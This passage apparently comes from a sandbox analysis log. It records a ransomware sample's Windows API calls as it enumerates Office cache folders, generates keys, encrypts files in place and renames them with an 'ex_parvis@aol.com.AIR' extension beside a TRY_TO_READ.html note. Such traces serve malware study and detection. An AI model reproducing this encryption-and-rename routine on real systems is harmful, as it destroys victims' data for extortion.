RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] FindNextFileW (in: hFindFile=0x35e158, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] FindNextFileW (in: hFindFile=0x35e158, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97242fd0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] FindNextFileW (in: hFindFile=0x35e158, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97242fd0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385578 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0144.666] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.666] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.666] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0144.667] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0144.667] GetProcessHeap () returned 0x2e0000 [0144.667] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x31d0048 [0144.667] lstrcpyW (in: lpString1=0x31d0048, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" [0144.667] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0144.667] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.670] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0 [0144.670] GetProcessHeap () returned 0x2e0000 [0144.670] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0144.670] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2624) returned 1 [0144.670] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa40 [0144.670] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.671] GetProcessHeap () returned 0x2e0000 [0144.671] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.671] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.671] WriteFile (in: hFile=0x4a0, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.672] WriteFile (in: hFile=0x4a0, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.672] WriteFile (in: hFile=0x4a0, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.672] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa40) returned 0x31d0048 [0144.672] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa40) returned 0x30d0048 [0144.672] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.672] ReadFile (in: hFile=0x4a0, lpBuffer=0x31d0048, nNumberOfBytesToRead=0xa40, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0048*, lpNumberOfBytesRead=0x2acf9c8*=0xa40, lpOverlapped=0x0) returned 1 [0144.673] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-2624, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.673] WriteFile (in: hFile=0x4a0, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xa40, lpOverlapped=0x0) returned 1 [0144.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0144.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0144.673] CloseHandle (hObject=0x4a0) returned 1 [0144.674] GetProcessHeap () returned 0x2e0000 [0144.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0144.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0144.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0144.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854d0 | out: hHeap=0x2e0000) returned 1 [0144.674] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33acb8 [0144.674] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0144.674] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0144.674] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.674] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.674] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", dwFileAttributes=0x80) returned 1 [0144.675] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 80 [0144.675] GetProcessHeap () returned 0x2e0000 [0144.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106) returned 0x30d0048 [0144.675] lstrcpyW (in: lpString1=0x30d0048, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" [0144.675] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0144.675] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.677] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0 [0144.677] GetProcessHeap () returned 0x2e0000 [0144.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0144.677] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=819) returned 1 [0144.677] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x333 [0144.677] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.677] GetProcessHeap () returned 0x2e0000 [0144.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.677] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.678] WriteFile (in: hFile=0x4a0, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.679] WriteFile (in: hFile=0x4a0, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.679] WriteFile (in: hFile=0x4a0, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.679] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x333) returned 0x30d0048 [0144.679] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x333) returned 0x30d0388 [0144.679] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.679] ReadFile (in: hFile=0x4a0, lpBuffer=0x30d0048, nNumberOfBytesToRead=0x333, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesRead=0x2acf9c8*=0x333, lpOverlapped=0x0) returned 1 [0144.679] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-819, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.679] WriteFile (in: hFile=0x4a0, lpBuffer=0x30d0388*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0388*, lpNumberOfBytesWritten=0x2acf9c8*=0x333, lpOverlapped=0x0) returned 1 [0144.680] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0144.680] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0388 | out: hHeap=0x2e0000) returned 1 [0144.680] CloseHandle (hObject=0x4a0) returned 1 [0144.680] GetProcessHeap () returned 0x2e0000 [0144.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0144.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0144.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33acb8 | out: hHeap=0x2e0000) returned 1 [0144.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0144.681] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0144.681] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0144.681] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0144.681] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.681] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.681] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", dwFileAttributes=0x80) returned 1 [0144.681] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 80 [0144.681] GetProcessHeap () returned 0x2e0000 [0144.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106) returned 0x30d0048 [0144.682] lstrcpyW (in: lpString1=0x30d0048, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" [0144.682] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0144.682] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.684] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0 [0144.685] GetProcessHeap () returned 0x2e0000 [0144.685] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0144.685] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=868864) returned 1 [0144.685] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd4200 [0144.685] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.685] GetProcessHeap () returned 0x2e0000 [0144.685] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.685] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.685] WriteFile (in: hFile=0x4a0, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.686] WriteFile (in: hFile=0x4a0, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.687] WriteFile (in: hFile=0x4a0, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.687] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4200) returned 0x33d0020 [0144.687] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4200) returned 0x34b0020 [0144.687] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.687] ReadFile (in: hFile=0x4a0, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd4200, lpOverlapped=0x0) returned 1 [0144.718] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e198 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.719] GetLastError () returned 0x0 [0144.719] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.719] GetLastError () returned 0x0 [0144.719] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.719] GetLastError () returned 0x0 [0144.719] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.719] GetLastError () returned 0x0 [0144.719] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, 